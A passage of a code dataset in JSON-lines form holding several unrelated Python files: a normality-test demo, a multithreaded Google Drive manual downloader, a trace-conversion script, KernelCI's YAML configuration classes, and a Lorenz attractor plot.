np\nfrom faker import Faker\n\n# Initialize Faker\nfake = Faker()\n\n# Set a seed for reproducibility\nseed = 42\nnp.random.seed(seed)\nFaker.seed(seed)\n\n# Number of samples\nn = 100\n\n# Create a DataFrame\ndf = pd.DataFrame({\n 'ID': [fake.uuid4() for _ in range(n)],\n 'Blood Glucose': np.concatenate([\n np.random.normal(150, 20, int(n/4)), # Diabetic & Overweight\n np.random.normal(130, 15, int(n/4)), # Diabetic & Not Overweight\n np.random.normal(100, 10, int(n/4)), # Non-diabetic & Overweight\n np.random.normal(90, 7, int(n/4)) # Non-diabetic & Not Overweight\n ]),\n 'Diabetic Status': np.concatenate([\n ['Diabetic'] * int(n/2),\n ['Non-diabetic'] * int(n/2)\n ]),\n 'Weight Status': np.concatenate([\n ['Overweight', 'Not Overweight'] * int(n/2)\n ])\n})\n\n# Shuffle the rows to make it more realistic\ndf = df.sample(frac=1).reset_index(drop=True)\n\n\n### checking for normality with Shapiro-Wilk test\n\n## way 1 \nimport scipy.stats as stats\n\ncombinations = [\n ('Diabetic', 'Overweight'),\n ('Diabetic', 'Not Overweight'),\n ('Non-diabetic', 'Overweight'),\n ('Non-diabetic', 'Not Overweight')\n]\n\nfor diabetic_status, weight_status in combinations:\n subset = df[(df['Diabetic Status'] == diabetic_status) & (df['Weight Status'] == weight_status)]\n _, p_value = stats.shapiro(subset['Blood Glucose'])\n \n print(f\"Group ({diabetic_status}, {weight_status}):\")\n print(f\"P-value from Shapiro-Wilk Test: {p_value}\\n\")\n\n## way 2\n\nimport scipy.stats as stats\n\ngroups = df.groupby(['Diabetic Status', 'Weight Status'])\n\nfor (diabetic_status, weight_status), group_df in groups:\n _, p_value = stats.shapiro(group_df['Blood Glucose'])\n \n print(f\"Group ({diabetic_status}, {weight_status}):\")\n print(f\"P-value from Shapiro-Wilk Test: {p_value}\\n\")\n\n\n## visualization\n\nimport matplotlib.pyplot as plt\nimport scipy.stats as stats\n\n# For demonstration purposes, let's use one of the subsets:\nsubset = df[(df['Diabetic Status'] == \"Diabetic\") & (df['Weight Status'] == \"Overweight\")]\n\n# Histogram\nplt.hist(subset['Blood Glucose'], bins=20, edgecolor='k', alpha=0.7)\nplt.title('Histogram of Blood Glucose Levels')\nplt.xlabel('Blood Glucose Level')\nplt.ylabel('Frequency')\nplt.show()\n\n# Q-Q Plot\nstats.probplot(subset['Blood Glucose'], plot=plt)\nplt.title('Q-Q Plot of Blood Glucose Levels')\nplt.show()","repo_name":"hantswilliams/HHA_507_2023","sub_path":"WK6/code/python/normality.py","file_name":"normality.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"72"} +{"seq_id":"20462046519","text":"import requests\r\nimport os\r\nimport tqdm\r\nfrom lxml import etree\r\nfrom multiprocessing.pool import ThreadPool #import ThreadPool\r\nimport time\r\n# 使用requests库获取网页内容\r\nresponse = requests.get('https://www.gadget-manual.com/dell/')\r\nhtml = response.content\r\n\r\n# 使用xpath解析网页内容\r\nselector = etree.HTML(html)\r\n#download_links0 = selector.xpath('/html/body/div[1]/div/div[4]/div/div[2]/div/div[2]/div/p/a/@href')#nvidia or amd or anrock\r\n#download_links0 = selector.xpath('/html/body/div[1]/div/div[4]/div/div[2]/div/div[2]/div/p/a/@href')\r\ndownload_links0 = selector.xpath('/html/body/div[1]/div/div[4]/div/div[2]/div/div[2]/div/p/u/a/@href')#hp\r\nif len(download_links0)<50:\r\n download_links0 = selector.xpath('/html/body/div[1]/div/div[4]/div/div[2]/div/div[2]/div/p/a/@href')\r\nif len(download_links0)<50:\r\n download_links0 = 
selector.xpath('/html/body/div[1]/div/div[4]/div/div[2]/div/div[2]/div/div/div[1]/div/p/u/a/@href')\r\n\r\n# 创建文件夹\r\nif not os.path.exists('D:/tuzhi'):\r\n os.makedirs('D:/tuzhi')\r\nproxies = {\r\n \"http\": \"http://127.0.0.1:7890\",\r\n \"https\": \"http://127.0.0.1:7890\",\r\n}\r\nhe = {\r\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36'\r\n}\r\n\r\nmax = len(download_links0)\r\nprint('链接数量',max)\r\nx1 = 0\r\n\r\n#定义下载函数\r\ndef download(link0):\r\n try:\r\n x=download_links0.index(link0)\r\n print('开始第{}个'.format(x))\r\n response0 = requests.get(link0,proxies=proxies,headers=he,timeout=6)\r\n html0 = response0.text\r\n # 使用xpath解析网页内容并获取文件名\r\n selector0 = etree.HTML(html0)\r\n filename0 = selector0.xpath('/html/head/meta[4]/@content')[0]#获取文件名\r\n print('文件名',filename0)\r\n # 将文件名按规则替换为下载链接\r\n link = link0.replace('/view?usp=sharing', '&export=download').replace('/file/d/', '/u/0/uc?id=').replace('/open?id=', '/u/0/uc?id=').replace('/view?usp=drivesdk','&export=download')#HP\r\n if '&export=download' not in link:\r\n link=link+'&export=download'\r\n\r\n\r\n filepath = 'D:/tuzhi/' + filename0#文件保存路径\r\n print(link)#打印下载链接\r\n\r\n try:\r\n # 计算下载文件的大小,如果小于5kb就重新下载\r\n response = requests.get(link,proxies=proxies,headers=he, stream=True)\r\n with open(filepath,'wb') as f:\r\n f.write(response.content)\r\n f.close()\r\n if os.path.exists(filepath):# 计算下载文件的大小,如果小于5kb就重新下载\r\n size = os.path.getsize(filepath)\r\n sizekb = '%.1f'%(size/1000)\r\n print('第{}个文件大小{}kb'.format(x,sizekb))\r\n while(1):\r\n if size > 5*1024:\r\n print('跳过')\r\n break \r\n else:\r\n time.sleep(5)\r\n print('{}重来!'.format(x))\r\n response = requests.get(link,proxies=proxies,headers=he, stream=True)\r\n with open(filepath,'wb') as f:\r\n f.write(response.content)\r\n f.close()\r\n size = os.path.getsize(filepath)\r\n \r\n\r\n except:\r\n print('错误',link)\r\n except:\r\n print('跳过{}'.format(x))\r\n x+=1\r\n\r\n#使用线程池\r\npool = ThreadPool(5) #线程数5\r\npool.map(download, download_links0[x1:max])\r\npool.close()\r\npool.join()\r\n\r\n","repo_name":"jxadcx/python_crawler","sub_path":"图纸多线程爬取.py","file_name":"图纸多线程爬取.py","file_ext":"py","file_size_in_byte":3652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70844344234","text":"import torch\nimport numpy as np\nimport random\nimport argparse\nfrom tqdm import tqdm\nrandom.seed(0)\n\nif __name__ == '__main__':\n file1 = open(\"../dlrm_embedding_temp/fbgemm_t856_bs65536_15_dataset_cache_miss_trace.txt\",\"r\")\n file2 = open(\"../dlrm_embedding_temp/fbgemm_t856_bs65536_15_prefetch_trace.txt\",\"w\")\n content_list = file1.readlines()\n\n start = 0\n end = len(content_list)\n interval = 5\n l = np.arange(start, end , interval)\n for i in tqdm(l):\n new_content = [0,int(float(content_list[i])),random.randint(0, 412403234),int(float(content_list[i+2])),0]\n file2.write(str(new_content))\n file2.write(\"\\n\")\n for j in range(4):\n file2.write(str([0,0,0,0,0]))\n file2.write(\"\\n\")\n file1.close()\n file2.close()\n\n","repo_name":"HaibaraAiChan/graph_partition_multi_layers","sub_path":"bakcode/optgen/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18156832187","text":"import yaml\n\n\n# -----------------------------------------------------------------------------\n# Common classes for all config 
types\n#\n\nclass YAMLObject(object):\n \"\"\"Base class with helper methods to initialise objects from YAML data.\"\"\"\n\n @classmethod\n def _kw_from_yaml(cls, data, args):\n \"\"\"Create some keyword arguments based on a YAML dictionary\n\n Return a dictionary suitable to be used as Python keyword arguments in\n an object constructor using values from some YAML *data*. The *args*\n is a list of keys to look up from the *data* and convert to a\n dictionary. Keys that are not in the YAML data are simply omitted from\n the returned keywords, relying on default values in object\n constructors.\n \"\"\"\n return {\n k: v for k, v in ((k, data.get(k)) for k in args) if v\n } if data else dict()\n\n\nclass Filter(object):\n \"\"\"Base class to implement arbitrary configuration filters.\"\"\"\n\n def __init__(self, items):\n \"\"\"The *items* can be any data used to filter configurations.\"\"\"\n self._items = items\n\n def match(self, **kw):\n \"\"\"Return True if the given *kw* keywords match the filter.\"\"\"\n raise NotImplementedError(\"Filter.match() is not implemented\")\n\n\nclass Blacklist(Filter):\n \"\"\"Blacklist filter to discard certain configurations.\n\n Blacklist *items* are a dictionary associating keys with lists of values.\n Any configuration with a key-value pair present in these lists will be\n rejected.\n \"\"\"\n\n def match(self, **kw):\n for k, v in kw.iteritems():\n bl = self._items.get(k)\n if not bl:\n continue\n if any(x in v for x in bl):\n return False\n\n return True\n\n\nclass Whitelist(Filter):\n \"\"\"Whitelist filter to only accept certain configurations.\n\n Whitelist *items* are a dictionary associating keys with lists of values.\n For a configuration to be accepted, there must be a value found in each of\n these lists.\n \"\"\"\n\n def match(self, **kw):\n for k, wl in self._items.iteritems():\n v = kw.get(k)\n if not v:\n return False\n if not any(x in v for x in wl):\n return False\n\n return True\n\n\nclass Combination(Filter):\n \"\"\"Combination filter to only accept some combined configurations.\n\n Combination *items* are a dictionary with 'keys' and 'values'. The 'keys'\n are a list of keywords to look for, and 'values' are a list of combined\n values for the given keys. The length of each 'values' item must therefore\n match the length of the 'keys' list, and the order of the values must match\n the order of the keys.\n \"\"\"\n\n def __init__(self, items):\n self._keys = tuple(items['keys'])\n self._values = list(tuple(values) for values in items['values'])\n\n def match(self, **kw):\n filter_values = tuple(kw.get(k) for k in self._keys)\n return filter_values in self._values\n\n\nclass FilterFactory(YAMLObject):\n \"\"\"Factory to create filters from YAML data.\"\"\"\n\n _classes = {\n 'blacklist': Blacklist,\n 'whitelist': Whitelist,\n 'combination': Combination,\n }\n\n @classmethod\n def from_yaml(cls, filter_params):\n \"\"\"Iterate through the YAML filters and return Filter objects.\"\"\"\n filter_list = []\n for f in filter_params:\n for filter_type, items in f.iteritems():\n filter_cls = cls._classes[filter_type]\n filter_list.append(filter_cls(items))\n return filter_list\n\n @classmethod\n def from_data(cls, data, default_filters=None):\n \"\"\"Look for filters in YAML *data* or return *default_filters*.\n\n Look for a *filters* element in the YAML *data* dictionary. 
If there\n is one, iterate over each item to return a list of Filter objects.\n Otherwise, return *default_filters*.\n \"\"\"\n params = data.get('filters')\n return cls.from_yaml(params) if params else default_filters\n\n\n# -----------------------------------------------------------------------------\n# Build configs\n#\n\nclass Tree(YAMLObject):\n \"\"\"Kernel git tree model.\"\"\"\n\n def __init__(self, name, url):\n \"\"\"A kernel git tree is essentially a repository with kernel branches.\n\n *name* is the name of the tree, such as \"mainline\" or \"next\".\n *url* is the git remote URL for the tree.\n \"\"\"\n self._name = name\n self._url = url\n\n @classmethod\n def from_yaml(cls, config, name):\n kw = {\n 'name': name,\n }\n kw.update(cls._kw_from_yaml(config, ['url', 'name']))\n return cls(**kw)\n\n @property\n def name(self):\n return self._name\n\n @property\n def url(self):\n return self._url\n\n\nclass Fragment(YAMLObject):\n \"\"\"Kernel config fragment model.\"\"\"\n\n def __init__(self, name, path, configs=None, defconfig=None):\n \"\"\"A kernel config fragment is a list of config options in file.\n\n *name* is the name of the config fragment so it can be referred to in\n other configuration objects.\n\n *path* is the path where the config fragment either can be found,\n either from the git checkout or after being generated.\n\n *configs* is an optional list of kernel configs to use when generating\n a config fragment that does not exist in the git checkout.\n\n *defconfig* is an optional defconfig name to use as a make target\n instead of a real config path. This is only used for\n special cases such as the tiny.config fragment which needs\n to be built with the tinyconfig make target.\n \"\"\"\n self._name = name\n self._path = path\n self._configs = configs or list()\n self._defconfig = defconfig\n\n @classmethod\n def from_yaml(cls, config, name):\n kw = {\n 'name': name,\n }\n kw.update(cls._kw_from_yaml(config, [\n 'name', 'path', 'configs', 'defconfig',\n ]))\n return cls(**kw)\n\n @property\n def name(self):\n return self._name\n\n @property\n def path(self):\n return self._path\n\n @property\n def configs(self):\n return list(self._configs)\n\n @property\n def defconfig(self):\n return self._defconfig\n\n\nclass Architecture(YAMLObject):\n \"\"\"CPU architecture attributes.\"\"\"\n\n def __init__(self, name, base_defconfig='defconfig', extra_configs=None,\n fragments=None, filters=None):\n \"\"\"Particularities to build kernels for each CPU architecture.\n\n *name* is the CPU architecture name as per the kernel's convention.\n\n *base_defconfig* is the defconfig used by default and as a basis when\n adding fragments.\n\n *extra_configs* is a list of extra defconfigs and make targets to\n build, for example allnoconfig, allmodconfig and any\n arbitrary some_defconfig+CONFIG_XXX=y definitions.\n\n *fragments* is a list of CPU-specific config fragments to build if\n present.\n\n *filters* is a list of filters to limit the number of builds, typically\n using a list of defconfigs to blacklist or whitelist.\n \"\"\"\n self._name = name\n self._base_defconfig = base_defconfig\n self._extra_configs = extra_configs or []\n self._fragments = fragments or []\n self._filters = filters or list()\n\n @classmethod\n def from_yaml(cls, data, name, fragments):\n kw = {\n 'name': name,\n }\n kw.update(cls._kw_from_yaml(data, [\n 'name', 'base_defconfig', 'extra_configs',\n ]))\n cf = data.get('fragments')\n kw['fragments'] = [fragments[name] for name in cf] if cf else None\n 
kw['filters'] = FilterFactory.from_data(data)\n return cls(**kw)\n\n @property\n def name(self):\n return self._name\n\n @property\n def base_defconfig(self):\n return self._base_defconfig\n\n @property\n def extra_configs(self):\n return list(self._extra_configs)\n\n @property\n def fragments(self):\n return list(self._fragments)\n\n def match(self, params):\n return all(f.match(**params) for f in self._filters)\n\n\nclass BuildEnvironment(YAMLObject):\n \"\"\"Kernel build environment model.\"\"\"\n\n def __init__(self, name, cc, cc_version, arch_map=None):\n \"\"\"A build environment is a compiler and tools to build a kernel.\n\n *name* is the name of the build environment so it can be referred to in\n other parts of the build configuration. Typical build\n environment names include the compiler type and version such as\n \"gcc-7\" although this is entirely arbitrary.\n\n *cc* is the compiler type, such as \"gcc\" or \"clang\". This is\n functional and indicates the actual compiler binary being used.\n\n *cc_version* is the full version of the compiler.\n\n *arch_map* is a dictionary mapping kernel CPU architecture names to\n ones used in compiler names. For example, gcc compilers are\n the same \"x86\" for both \"i386\" and \"x86_64\" kernel\n architectures.\n \"\"\"\n self._name = name\n self._cc = cc\n self._cc_version = str(cc_version)\n self._arch_map = arch_map or dict()\n\n @classmethod\n def from_yaml(cls, config, name):\n kw = {\n 'name': name,\n }\n kw.update(cls._kw_from_yaml(\n config, ['name', 'cc', 'cc_version', 'arch_map']))\n return cls(**kw)\n\n @property\n def name(self):\n return self._name\n\n @property\n def cc(self):\n return self._cc\n\n @property\n def cc_version(self):\n return self._cc_version\n\n def get_arch_name(self, kernel_arch):\n return self._arch_map.get(kernel_arch, kernel_arch)\n\n\nclass BuildVariant(YAMLObject):\n \"\"\"A variant of a given build configuration.\"\"\"\n\n def __init__(self, name, architectures, build_environment, fragments=None):\n \"\"\"A build variant is a sub-section of a build configuration.\n\n *name* is the name of the build variant. It is arbitrary and defined\n to be able to refer to the build variant in other parts of the\n build configurations or the code using it.\n\n *architectures* is a list of Architecture objects. There can only be\n one Architecture object for any given kernel CPU\n architecture name. 
This list defines the architectures\n that should be built for a given build variant.\n\n *build_environment* is a BuildEnvironment object, to define which\n compiler to use to build the kernels.\n\n *fragments* is an optional list of Fragment objects to define fragments\n to build with this build variant.\n \"\"\"\n self._name = name\n self._architectures = architectures\n self._build_environment = build_environment\n self._fragments = fragments or list()\n\n @classmethod\n def from_yaml(cls, config, name, fragments, build_environments):\n kw = {\n 'name': name,\n }\n kw.update(cls._kw_from_yaml(\n config, ['name', 'build_environment', 'fragments']))\n kw['build_environment'] = build_environments[kw['build_environment']]\n kw['architectures'] = list(\n Architecture.from_yaml(data or {}, name, fragments)\n for name, data in config['architectures'].iteritems()\n )\n cf = kw.get('fragments')\n kw['fragments'] = [fragments[name] for name in cf] if cf else None\n return cls(**kw)\n\n @property\n def name(self):\n return self._name\n\n @property\n def arch_list(self):\n return list(arch.name for arch in self._architectures)\n\n @property\n def architectures(self):\n return list(self._architectures)\n\n @property\n def build_environment(self):\n return self._build_environment\n\n @property\n def fragments(self):\n return list(self._fragments)\n\n\nclass BuildConfig(YAMLObject):\n \"\"\"Build configuration model.\"\"\"\n\n def __init__(self, name, tree, branch, variants):\n \"\"\"A build configuration defines the actual kernels to be built.\n\n *name* is the name of the build configuration. It is arbitrary and\n used in other places to refer to the build configuration.\n\n *tree* is a Tree object, where the kernel branch to be built can be\n found.\n\n *branch* is the name of the branch to build. 
There can only be one\n branch in each BuildConfig object.\n\n *variants* is a list of BuildVariant objects, to define all the\n variants to build for this tree / branch combination.\n \"\"\"\n self._name = name\n self._tree = tree\n self._branch = branch\n self._variants = variants\n\n @classmethod\n def from_yaml(cls, config, name, trees, fragments, build_envs, defaults):\n kw = {\n 'name': name,\n }\n kw.update(cls._kw_from_yaml(\n config, ['name', 'tree', 'branch']))\n kw['tree'] = trees[kw['tree']]\n config_variants = config.get('variants', defaults)\n variants = [\n BuildVariant.from_yaml(variant, name, fragments, build_envs)\n for name, variant in config_variants.iteritems()\n ]\n kw['variants'] = {v.name: v for v in variants}\n return cls(**kw)\n\n @property\n def name(self):\n return self._name\n\n @property\n def tree(self):\n return self._tree\n\n @property\n def branch(self):\n return self._branch\n\n @property\n def variants(self):\n return list(self._variants.values())\n\n def get_variant(self, name):\n return self._variants[name]\n\n\n# -----------------------------------------------------------------------------\n# Test configs\n#\n\nclass DeviceType(YAMLObject):\n \"\"\"Device type model.\"\"\"\n\n def __init__(self, name, mach, arch, boot_method, dtb=None,\n flags=None, filters=None, context=None):\n \"\"\"A device type describes a category of equivalent hardware devices.\n\n *name* is unique for the device type, typically as used by LAVA.\n *mach* is the name of the SoC manufacturer.\n *arch* is the CPU architecture following the Linux kernel convention.\n *boot_method* is the name of the boot method to use.\n *dtb* is an optional name for a device tree binary.\n *flags* is a list of optional arbitrary strings.\n *filters* is a list of Filter objects associated with this device type.\n *context* is an arbirary dictionary used when scheduling tests.\n \"\"\"\n self._name = name\n self._mach = mach\n self._arch = arch\n self._boot_method = boot_method\n self._dtb = dtb\n self._flags = flags or list()\n self._filters = filters or list()\n self._context = context or dict()\n\n def __repr__(self):\n return self.name\n\n @property\n def name(self):\n return self._name\n\n @property\n def mach(self):\n return self._mach\n\n @property\n def arch(self):\n return self._arch\n\n @property\n def boot_method(self):\n return self._boot_method\n\n @property\n def dtb(self):\n return self._dtb\n\n @property\n def context(self):\n return self._context\n\n def get_flag(self, name):\n return name in self._flags\n\n def match(self, flags, config):\n \"\"\"Checks if the given *flags* and *config* match this device type.\"\"\"\n return (\n all(not v or self.get_flag(k) for k, v in flags.iteritems()) and\n all(f.match(**config) for f in self._filters)\n )\n\n\nclass DeviceType_arm(DeviceType):\n\n def __init__(self, name, mach, arch='arm', *args, **kw):\n \"\"\"arm device type with a device tree.\"\"\"\n kw.setdefault('dtb', '{}.dtb'.format(name))\n super(DeviceType_arm, self).__init__(name, mach, arch, *args, **kw)\n\n\nclass DeviceType_arm64(DeviceType):\n\n def __init__(self, name, mach, arch='arm64', *args, **kw):\n \"\"\"arm64 device type with a device tree.\"\"\"\n kw.setdefault('dtb', '{}/{}.dtb'.format(mach, name))\n super(DeviceType_arm64, self).__init__(name, mach, arch, *args, **kw)\n\n\nclass DeviceTypeFactory(YAMLObject):\n \"\"\"Factory to create device types from YAML data.\"\"\"\n\n _classes = {\n 'arm-dtb': DeviceType_arm,\n 'arm64-dtb': DeviceType_arm64,\n }\n\n 
@classmethod\n def from_yaml(cls, name, device_type, default_filters=None):\n kw = cls._kw_from_yaml(device_type, [\n 'mach', 'arch', 'boot_method', 'dtb', 'flags', 'context'])\n kw.update({\n 'name': device_type.get('name', name),\n 'filters': FilterFactory.from_data(device_type, default_filters),\n })\n cls_name = device_type.get('class')\n device_cls = cls._classes[cls_name] if cls_name else DeviceType\n return device_cls(**kw)\n\n\nclass RootFSType(YAMLObject):\n \"\"\"Root file system type model.\"\"\"\n\n def __init__(self, url, arch_dict=None):\n \"\"\"A root file system type covers common file system features.\n\n *url* is the base URL for file system binaries. Each file system\n variant will have some URLs based on this one with various\n formats and architectures.\n\n *arch_dict* is a dictionary to map CPU architecture names following the\n kernel convention with distribution architecture names as\n used by the file system type. Keys are the names used by\n the root file system type (distro), and values are lists of\n dictionaries with kernel architecture names and other\n properties such as the endianness.\n \"\"\"\n self._url = url\n self._arch_dict = arch_dict or dict()\n\n @classmethod\n def from_yaml(cls, fs_type):\n kw = cls._kw_from_yaml(fs_type, ['url'])\n arch_map = fs_type.get('arch_map')\n if arch_map:\n arch_dict = {}\n for arch_name, arch_dicts in arch_map.iteritems():\n for d in arch_dicts:\n key = tuple((k, v) for (k, v) in d.iteritems())\n arch_dict[key] = arch_name\n kw['arch_dict'] = arch_dict\n return cls(**kw)\n\n @property\n def url(self):\n return self._url\n\n def get_arch_name(self, arch, endian):\n arch_key = ('arch', arch)\n endian_key = ('endian', endian)\n arch_name = (self._arch_dict.get((arch_key, endian_key)) or\n self._arch_dict.get((arch_key,), arch))\n return arch_name\n\n\nclass RootFS(YAMLObject):\n \"\"\"Root file system model.\"\"\"\n\n def __init__(self, url_formats, fs_type, boot_protocol='tftp',\n root_type=None, prompt=\"/ #\"):\n \"\"\"A root file system is any user-space that can be used in test jobs.\n\n *url_formats* are a dictionary with a format string for each type of\n file system available (ramdisk, nfs...). There is\n typically only one entry here for the main *root_type*,\n but multiple entries are possible in particular to boot\n with first a ramdisk and then pivot to nfs root.\n\n *fs_type* is a RootFSType instance.\n\n *boot_protocol* is how the file system is made available to the kernel,\n by default `tftp` typically to download a ramdisk.\n\n *root_type* is the name of the file system type (ramdisk, ...) 
as used\n in the job template naming scheme.\n\n *prompt* is a string used in the job definition to tell when the\n user-space is available to run some commands.\n \"\"\"\n self._url_format = url_formats\n self._fs_type = fs_type\n self._root_type = root_type or url_formats.keys()[0]\n self._boot_protocol = boot_protocol\n self._prompt = prompt\n self._arch_dict = {}\n\n @classmethod\n def from_yaml(cls, file_system_types, rootfs):\n kw = cls._kw_from_yaml(rootfs, [\n 'boot_protocol', 'root_type', 'prompt'])\n fs_type = file_system_types[rootfs['type']]\n base_url = fs_type.url\n kw['fs_type'] = fs_type\n kw['url_formats'] = {\n fs: '/'.join([base_url, url]) for fs, url in (\n (fs, rootfs.get(fs)) for fs in ['ramdisk', 'nfs'])\n if url\n }\n return cls(**kw)\n\n @property\n def prompt(self):\n return self._prompt\n\n @property\n def boot_protocol(self):\n return self._boot_protocol\n\n @property\n def root_type(self):\n return self._root_type\n\n def get_url(self, fs_type, arch, endian):\n \"\"\"Get the URL of the file system for the given variant and arch.\n\n The *fs_type* should match one of the URL patterns known to this root\n file system.\n \"\"\"\n fmt = self._url_format.get(fs_type)\n if not fmt:\n return None\n arch_name = self._fs_type.get_arch_name(arch, endian)\n return fmt.format(arch=arch_name)\n\n\nclass TestPlan(YAMLObject):\n \"\"\"Test plan model.\"\"\"\n\n _pattern = '{plan}/{category}-{method}-{protocol}-{rootfs}-{plan}-template.jinja2'\n\n def __init__(self, name, rootfs, params=None, category='generic',\n filters=None, pattern=None):\n \"\"\"A test plan is an arbitrary group of test cases to be run.\n\n *name* is the overall arbitrary test plan name, used when looking for\n job template files.\n\n *rootfs* is a RootFS object to be used to run this test plan.\n\n *params* is a dictionary with parameters to pass to the test job\n generator.\n\n *category* is to classify the type of job to be run, used when looking\n for job template files.\n\n *filters* is a list of Filter objects associated with this test plan.\n\n *pattern* is a string pattern to create the path to the job template\n file, see TestPlan._pattern for the default value with the\n regular template file naming scheme.\n \"\"\"\n self._name = name\n self._rootfs = rootfs\n self._params = params or dict()\n self._category = category\n self._filters = filters or list()\n if pattern:\n self._pattern = pattern\n\n @classmethod\n def from_yaml(cls, name, test_plan, file_systems, default_filters=None):\n kw = {\n 'name': name,\n 'rootfs': file_systems[test_plan['rootfs']],\n 'filters': FilterFactory.from_data(test_plan, default_filters),\n }\n kw.update(cls._kw_from_yaml(test_plan, [\n 'name', 'category', 'pattern', 'params']))\n return cls(**kw)\n\n @property\n def name(self):\n return self._name\n\n @property\n def rootfs(self):\n return self._rootfs\n\n @property\n def params(self):\n return dict(self._params)\n\n def get_template_path(self, boot_method):\n \"\"\"Get the path to the template file for the given *boot_method*\n\n As different device types use different boot methods (u-boot, grub...),\n each test plan can have several template variants to accommodate for\n these. 
All the other parameters are attributes of the test plan.\n \"\"\"\n return self._pattern.format(\n category=self._category,\n method=boot_method,\n protocol=self.rootfs.boot_protocol,\n rootfs=self.rootfs.root_type,\n plan=self.name)\n\n def match(self, config):\n return all(f.match(**config) for f in self._filters)\n\n\nclass TestConfig(YAMLObject):\n \"\"\"Test configuration model.\"\"\"\n\n def __init__(self, device_type, test_plans, filters=None):\n \"\"\"A test configuration has a *device_type* and a list of *test_plans*.\n\n *device_type* is a DeviceType object.\n *test_plans* is a list of TestPlan objects to run on the device type.\n \"\"\"\n self._device_type = device_type\n self._test_plans = {\n t.name: t for t in test_plans\n }\n self._filters = filters or list()\n\n @classmethod\n def from_yaml(cls, test_config, device_types, test_plans,\n default_filters=None):\n kw = {\n 'device_type': device_types[test_config['device_type']],\n 'test_plans': [test_plans[test]\n for test in test_config['test_plans']],\n 'filters': FilterFactory.from_data(test_config, default_filters),\n }\n\n return cls(**kw)\n\n @property\n def device_type(self):\n return self._device_type\n\n @property\n def test_plans(self):\n return self._test_plans\n\n def match(self, arch, plan, flags, config):\n return (\n plan in self._test_plans and\n self._test_plans[plan].match(config) and\n self.device_type.arch == arch and\n self.device_type.match(flags, config) and\n all(f.match(**config) for f in self._filters)\n )\n\n def get_template_path(self, plan):\n test_plan = self._test_plans[plan]\n return test_plan.get_template_path(self._device_type.boot_method)\n\n\n# -----------------------------------------------------------------------------\n# Entry points\n#\n\ndef builds_from_yaml(yaml_path):\n with open(yaml_path) as f:\n data = yaml.load(f)\n\n trees = {\n name: Tree.from_yaml(config, name)\n for name, config in data['trees'].iteritems()\n }\n\n fragments = {\n name: Fragment.from_yaml(config, name)\n for name, config in data.get('fragments', {}).iteritems()\n }\n\n build_environments = {\n name: BuildEnvironment.from_yaml(config, name)\n for name, config in data['build_environments'].iteritems()\n }\n\n defaults = data.get('build_configs_defaults', {})\n\n build_configs = {\n name: BuildConfig.from_yaml(config, name, trees, fragments,\n build_environments, defaults)\n for name, config in data['build_configs'].iteritems()\n }\n\n config_data = {\n 'trees': trees,\n 'fragments': fragments,\n 'build_environments': build_environments,\n 'build_configs': build_configs,\n }\n\n return config_data\n\n\ndef tests_from_yaml(yaml_path):\n with open(yaml_path) as f:\n data = yaml.load(f)\n\n fs_types = {\n name: RootFSType.from_yaml(fs_type)\n for name, fs_type in data['file_system_types'].iteritems()\n }\n\n file_systems = {\n name: RootFS.from_yaml(fs_types, rootfs)\n for name, rootfs in data['file_systems'].iteritems()\n }\n\n plan_filters = FilterFactory.from_yaml(data['test_plan_default_filters'])\n\n test_plans = {\n name: TestPlan.from_yaml(name, test_plan, file_systems, plan_filters)\n for name, test_plan in data['test_plans'].iteritems()\n }\n\n device_filters = FilterFactory.from_yaml(data['device_default_filters'])\n\n device_types = {\n name: DeviceTypeFactory.from_yaml(name, device_type, device_filters)\n for name, device_type in data['device_types'].iteritems()\n }\n\n test_configs = [\n TestConfig.from_yaml(test_config, device_types, test_plans)\n for test_config in data['test_configs']\n ]\n\n 
config_data = {\n 'file_systems': file_systems,\n 'test_plans': test_plans,\n 'device_types': device_types,\n 'test_configs': test_configs,\n }\n\n return config_data\n","repo_name":"roxell/test-kernelci-core","sub_path":"kernelci/configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":27899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73411481512","text":"import matplotlib.pyplot as plt\r\n\r\n# Given the equations, defining the values of parameters\r\nsigma = 10\r\nbeta = 8/3\r\nrho= 28\r\ndt = 0.01\r\n\r\n# Get Equations\r\ndef equations(a, b, c):\r\n return sigma*(b-a), rho*a-a*c-b, a*b-beta*c\r\n\r\n\r\ndef f_coordinates(x, y, z):\r\n n = 13500 #steps\r\n t = 2\r\n \r\n #Initialize empty arrays for coordinates of X, Y, Z\r\n x_new = []\r\n y_new = []\r\n z_new = []\r\n \r\n #Determine coordinates of the point, step-by-step\r\n for i in range(n):\r\n dxdt, dydt, dzdt = equations(x, y, z)\r\n dx = dxdt * dt\r\n dy = dydt * dt\r\n dz = dzdt * dt\r\n \r\n x = x + dx\r\n y = y + dy\r\n z = z + dz\r\n t = t + dt\r\n \r\n x_new.append(x)\r\n y_new.append(y)\r\n z_new.append(z)\r\n \r\n\r\n # Plot\r\n r = plt.figure().add_subplot(projection='3d')\r\n r.plot(x_new, y_new, z_new, lw=0.5)\r\n r.set_xlabel(\"x\")\r\n r.set_ylabel(\"y\")\r\n r.set_zlabel(\"z\")\r\n r.set_title(\"Lorenz Attractor\", fontname=\"Times New Roman\", fontweight=\"bold\", fontsize=18)\r\n plt.savefig('xyz.png')\r\n plt.show()\r\n\r\n\r\n fig, u = plt.subplots(1, 3, sharex=False, sharey=False, figsize=(17, 6))\r\n \r\n # plot the x values vs the y values\r\n u[0].plot(x_new, y_new, color='r', alpha=0.7, linewidth=0.3)\r\n u[0].set_title('X-Y phase plane', fontweight=\"bold\" )\r\n # plot the x values vs the z values\r\n u[1].plot(x_new, z_new, color='m', alpha=0.7, linewidth=0.3)\r\n u[1].set_title('X-Z phase plane', fontweight=\"bold\")\r\n # plot the y values vs the z values\r\n u[2].plot(y_new, z_new, color='b', alpha=0.7, linewidth=0.3)\r\n u[2].set_title('Y-Z phase plane', fontweight=\"bold\")\r\n\r\n plt.savefig(\"subplots.png\")\r\n plt.show()\r\n\r\nif __name__ == '__main__': \r\n f_coordinates(0., 1., 